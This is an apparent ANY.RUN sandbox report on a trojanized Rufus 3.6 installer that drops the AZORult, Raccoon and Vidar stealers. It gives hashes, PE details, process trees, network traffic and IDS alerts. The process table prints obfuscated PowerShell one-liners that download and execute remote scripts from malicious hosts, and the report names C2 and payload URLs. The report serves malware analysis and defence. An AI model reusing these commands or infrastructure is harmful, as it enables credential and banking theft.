analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

rufus-3.6.exe

Full analysis: https://app.any.run/tasks/f319ca7c-7f36-4099-a87d-a0761316996c
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Malware Trends Tracker     >>>
Analysis date: August 08, 2020, 10:25:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
stealer
raccoon
rat
azorult
vidar
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

FCB9B4A7E6923C8BCFFD26ABE6B5008B

SHA1:

BCD676A08B9E076725E5D1185085A2E13A03FA56

SHA256:

6F89C43EB5E4F901D016894089D35CC48911A5FEB7E8A2403C4B187BAB13F938

SSDEEP:

24576:4ji+2seLAj/gHMBcUdWJaa+KFe1T2rreo/TVVjdh:4ji+BjYHMmUdWJajTKeoLV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • rufus-3.6.exe (PID: 2848)
      • rufus-3.6.exe (PID: 976)
      • rufus-3.6.exe (PID: 2232)
      • pqz.exe (PID: 2400)
      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 956)
      • Pvjadebv.exe (PID: 2360)
      • Pvjadebv.exe (PID: 3020)
      • ZsN4wOiOUk.exe (PID: 2404)
      • 2qsblmEdg9.exe (PID: 3148)
      • uFPEgNsrei.exe (PID: 3256)
      • 1v1DzM02SI.exe (PID: 2720)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2196)

    • Changes Windows auto-update feature

      • rufus-3.6.exe (PID: 2232)

    • Disables Windows Defender

      • rufus-3.6.exe (PID: 2232)

    • Changes settings of System certificates

      • rufus-3.6.exe (PID: 2232)

    • AZORULT was detected

      • Pvjadebv.exe (PID: 3020)

    • Connects to CnC server

      • pqz.exe (PID: 2600)
      • Pvjadebv.exe (PID: 3020)

    • RACCOON was detected

      • pqz.exe (PID: 2600)

    • Downloads executable files from the Internet

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)

    • Loads dropped or rewritten executable

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)

    • VIDAR was detected

      • Pvjkdebv.exe (PID: 2248)

    • Downloads executable files from IP

      • pqz.exe (PID: 2600)

    • Stealing of credential data

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)

    • Actions looks like stealing of personal data

      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • rufus-3.6.exe (PID: 2872)
      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)

    • Executable content was dropped or overwritten

      • rufus-3.6.exe (PID: 2872)
      • powershell.exe (PID: 2816)
      • pqz.exe (PID: 2400)
      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)

    • Creates files in the user directory

      • powershell.exe (PID: 3172)
      • powershell.exe (PID: 2436)
      • powershell.exe (PID: 2816)

    • Application launched itself

      • Pvjkdebv.exe (PID: 956)
      • pqz.exe (PID: 2400)
      • Pvjadebv.exe (PID: 2360)

    • Reads Internet Cache Settings

      • rufus-3.6.exe (PID: 2232)
      • Pvjkdebv.exe (PID: 2248)
      • Pvjadebv.exe (PID: 3020)
      • pqz.exe (PID: 2600)
      • ZsN4wOiOUk.exe (PID: 2404)

    • Adds / modifies Windows certificates

      • rufus-3.6.exe (PID: 2232)

    • Creates files in the program directory

      • Pvjkdebv.exe (PID: 2248)

    • Connects to server without host name

      • pqz.exe (PID: 2600)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • pqz.exe (PID: 2600)

    • Reads the cookies of Google Chrome

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)

    • Searches for installed software

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)

    • Reads the cookies of Mozilla Firefox

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2472)

    • Starts CMD.EXE for self-deleting

      • pqz.exe (PID: 2600)

  • INFO

    • Reads settings of System Certificates

      • rufus-3.6.exe (PID: 2232)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (39.3)
.exe | Win32 EXE Yoda's Crypter (38.6)
.dll | Win32 Dynamic Link Library (generic) (9.5)
.exe | Win32 Executable (generic) (6.5)
.exe | Generic Win/DOS Executable (2.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2015:04:18 14:16:08+02:00
PEType: PE32
LinkerVersion: 2.5
CodeSize: 1138688
InitializedDataSize: 36864
UninitializedDataSize: 98304
EntryPoint: 0x12d5e0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 18-Apr-2015 12:16:08

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 18-Apr-2015 12:16:08
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x00018000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x00019000
0x00116000
0x00115200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.99979
.rsrc
0x0012F000
0x00009000
0x00009000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.80667

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.92322
611
Latin 1 / Western European
UNKNOWN
RT_MANIFEST
2
3.68423
9640
Latin 1 / Western European
UNKNOWN
RT_ICON
3
3.77127
4264
Latin 1 / Western European
UNKNOWN
RT_ICON
4
3.98144
2440
Latin 1 / Western European
UNKNOWN
RT_ICON
5
4.04318
1128
Latin 1 / Western European
UNKNOWN
RT_ICON
B
6.05463
78
Latin 1 / Western European
UNKNOWN
RT_RCDATA
D
3.80735
14
Latin 1 / Western European
UNKNOWN
RT_RCDATA
F
7.96507
1142956
Latin 1 / Western European
UNKNOWN
RT_RCDATA
I
6.45459
112
Latin 1 / Western European
UNKNOWN
RT_RCDATA
N
4.32193
20
Latin 1 / Western European
UNKNOWN
RT_RCDATA

Imports

COMCTL32.dll
GDI32.dll
KERNEL32.DLL
MSVCRT.dll
OLE32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
68
Monitored processes
22
Malicious processes
10
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start rufus-3.6.exe cmd.exe no specs powershell.exe powershell.exe powershell.exe rufus-3.6.exe no specs rufus-3.6.exe no specs rufus-3.6.exe pqz.exe pvjkdebv.exe no specs pvjadebv.exe no specs #RACCOON pqz.exe #VIDAR pvjkdebv.exe #AZORULT pvjadebv.exe cmd.exe no specs taskkill.exe no specs zsn4woiouk.exe no specs 2qsblmedg9.exe no specs 1v1dzm02si.exe no specs ufpegnsrei.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2872"C:\Users\admin\AppData\Local\Temp\rufus-3.6.exe" C:\Users\admin\AppData\Local\Temp\rufus-3.6.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2196cmd /c ""C:\Users\admin\AppData\Local\Temp\11A9.tmp\start.bat" C:\Users\admin\AppData\Local\Temp\rufus-3.6.exe"C:\Windows\system32\cmd.exerufus-3.6.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2436"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $iq=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $iq;$skh=((New-Object Net.WebClient)).DownloadString('http://bit.do/e2q3W');s $skhC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3172"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $dr=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $dr;$sv=((New-Object Net.WebClient)).DownloadString('http://bit.do/e2q4h');s $svC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2816"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $pz=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $pz;$sy=((New-Object Net.WebClient)).DownloadString('http://opesjk.ug/asdf.ps1');s $syC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2848rufus-3.6.exe C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.execmd.exe
User:
admin
Company:
Akeo Consulting
Integrity Level:
MEDIUM
Description:
Rufus
Exit code:
3221226540
Version:
3.6.1551
976"C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe" C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.execmd.exe
User:
admin
Company:
Akeo Consulting
Integrity Level:
MEDIUM
Description:
Rufus
Exit code:
3221226540
Version:
3.6.1551
2232"C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe" C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe
cmd.exe
User:
admin
Company:
Akeo Consulting
Integrity Level:
HIGH
Description:
Rufus
Version:
3.6.1551
2400"C:\Users\Public\pqz.exe"C:\Users\Public\pqz.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
4175.2546.7542
956"C:\Users\admin\AppData\Local\Temp\Pvjkdebv.exe" C:\Users\admin\AppData\Local\Temp\Pvjkdebv.exepqz.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
2778.4422.7835
Total events
3 113
Read events
2 822
Write events
0
Delete events
0

Modification events

No data
Executable files
79
Suspicious files
16
Text files
24
Unknown types
8

Dropped files

PID
Process
Filename
Type
2436powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TGP1W3NJSM76BG422IE3.temp
MD5:
SHA256:
3172powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N48OC5W7BT37EESY1LSQ.temp
MD5:
SHA256:
2816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEWXZZES08QPS5SYLUD3.temp
MD5:
SHA256:
2232rufus-3.6.exeC:\Users\admin\AppData\Local\Temp\Cab3DEB.tmp
MD5:
SHA256:
2232rufus-3.6.exeC:\Users\admin\AppData\Local\Temp\Tar3DEC.tmp
MD5:
SHA256:
2232rufus-3.6.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Fido[1].ver
MD5:
SHA256:
3172powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a8204fabd87c2f30.customDestinations-msbinary
MD5:BA78F5C7C9CF99CCA8EBC8C6FE2024D0
SHA256:720AAFC723F8809858D024BDD80454C4D8F1A1AE2ED45AAAC06A78B2DD06BA77
2872rufus-3.6.exeC:\Users\admin\AppData\Local\Temp\11A9.tmp\start.battext
MD5:FCFD92442D1B5968E4FA816E2105F5C7
SHA256:7348BDDD92276514AAE87A8FA7122202E8B5567E1E4763770FC9F349D0D6B0E3
2872rufus-3.6.exeC:\Users\admin\AppData\Local\Temp\11A9.tmp\1.lnklnk
MD5:3929DAD4933A371C31FC75C3B254D561
SHA256:3C22D38A46AAE66822B705B080970639FCE60B9977033F6EFD96DA49CF6529EF
2232rufus-3.6.exeC:\Users\admin\AppData\Local\Temp\Ruf1E0D.tmptext
MD5:7B64F60090644983A9110506EDDA375C
SHA256:A44694A98C26E0252AEDC4CE3D60421EB567A42C90FC1B11824B4BC9E9A6B6AF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
27
TCP/UDP connections
18
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2816
powershell.exe
GET
200
217.8.117.77:80
http://opesjk.ug/asdf.ps1
unknown
text
1.54 Mb
malicious
2232
rufus-3.6.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTuqL92L3tjkN67RNFF%2FEdvT6NEzAQUwBKyKHRoRmfpcCV0GgBFWwZ9XEQCEAgt9o7pxpMVvr9yB5s4EP0%3D
US
der
471 b
whitelisted
2436
powershell.exe
GET
301
54.83.52.76:80
http://bit.do/e2q3W
US
html
308 b
shared
3172
powershell.exe
GET
301
54.83.52.76:80
http://bit.do/e2q4h
US
html
309 b
shared
3020
Pvjadebv.exe
POST
200
217.8.117.77:80
http://michaeldiamantis.ug/index.php
unknown
text
4 b
malicious
2232
rufus-3.6.exe
GET
200
2.16.186.35:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
unknown
der
1.37 Kb
whitelisted
3172
powershell.exe
GET
200
194.85.61.76:80
http://partaususd.ru/asdf.ps1
RU
html
1.06 Kb
malicious
2232
rufus-3.6.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D
US
der
471 b
whitelisted
2600
pqz.exe
GET
200
34.65.10.107:80
http://34.65.10.107/gate/sqlite3.dll
US
executable
895 Kb
malicious
2248
Pvjkdebv.exe
POST
200
217.8.117.77:80
http://mantis.ug/nss3.dll
unknown
executable
1.19 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2232
rufus-3.6.exe
185.199.111.153:443
rufus.ie
GitHub, Inc.
NL
shared
2816
powershell.exe
217.8.117.77:80
opesjk.ug
malicious
3172
powershell.exe
194.85.61.76:80
partaususd.ru
Jsc ru-center
RU
malicious
2232
rufus-3.6.exe
2.16.186.35:80
isrg.trustid.ocsp.identrust.com
Akamai International B.V.
whitelisted
2232
rufus-3.6.exe
140.82.118.4:443
github.com
US
malicious
2436
powershell.exe
54.83.52.76:80
bit.do
Amazon.com, Inc.
US
shared
3172
powershell.exe
54.83.52.76:80
bit.do
Amazon.com, Inc.
US
shared
2600
pqz.exe
217.8.117.77:80
opesjk.ug
malicious
3020
Pvjadebv.exe
217.8.117.77:80
opesjk.ug
malicious
2600
pqz.exe
34.65.10.107:80
US
malicious

DNS requests

Domain
IP
Reputation
bit.do
  • 54.83.52.76
shared
marksidfg.ug
malicious
opesjk.ug
  • 217.8.117.77
malicious
partaususd.ru
  • 194.85.61.76
  • 109.70.26.37
malicious
rufus.ie
  • 185.199.111.153
  • 185.199.109.153
  • 185.199.110.153
  • 185.199.108.153
suspicious
isrg.trustid.ocsp.identrust.com
  • 2.16.186.35
  • 2.16.186.11
whitelisted
github.com
  • 140.82.118.4
shared
ocsp.digicert.com
  • 93.184.220.29
whitelisted
github-production-release-asset-2e65be.s3.amazonaws.com
  • 52.217.64.44
shared
telete.in
  • 195.201.225.248
shared

Threats

PID
Process
Class
Message
2436
powershell.exe
Misc activity
ET INFO Bit.do Shortened Link Request (set)
3172
powershell.exe
Misc activity
ET INFO Bit.do Shortened Link Request (set)
2816
powershell.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
2816
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Script/Oneeva.A!ml
2816
powershell.exe
Misc activity
ET POLICY EXE Base64 Encoded potential malware
2600
pqz.exe
A Network Trojan was detected
AV TROJAN Trojan-Spy.MSIL.Stealer.ahp CnC Checkin
2600
pqz.exe
A Network Trojan was detected
STEALER [PTsecurity] Raccoon
2600
pqz.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host DLL Request
2600
pqz.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3020
Pvjadebv.exe
A Network Trojan was detected
ET TROJAN Win32/AZORult V3.3 Client Checkin M2
20 ETPRO signatures available at the full report
Process
Message
rufus-3.6.exe
*** Rufus init ***
rufus-3.6.exe
Binary executable is signed by 'Akeo Consulting'
rufus-3.6.exe
Binary executable is signed by 'Akeo Consulting'
rufus-3.6.exe
Will use settings from registry
rufus-3.6.exe
loc file not found in current directory - embedded one will be used
rufus-3.6.exe
localization: extracted data to 'C:\Users\admin\AppData\Local\Temp\Ruf1E0D.tmp'
rufus-3.6.exe
localization: found locale 'en-US'
rufus-3.6.exe
localization: found locale 'ar-SA'
rufus-3.6.exe
localization: found locale 'bg-BG'
rufus-3.6.exe
localization: found locale 'zh-CN'
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
rufus-3.6.exe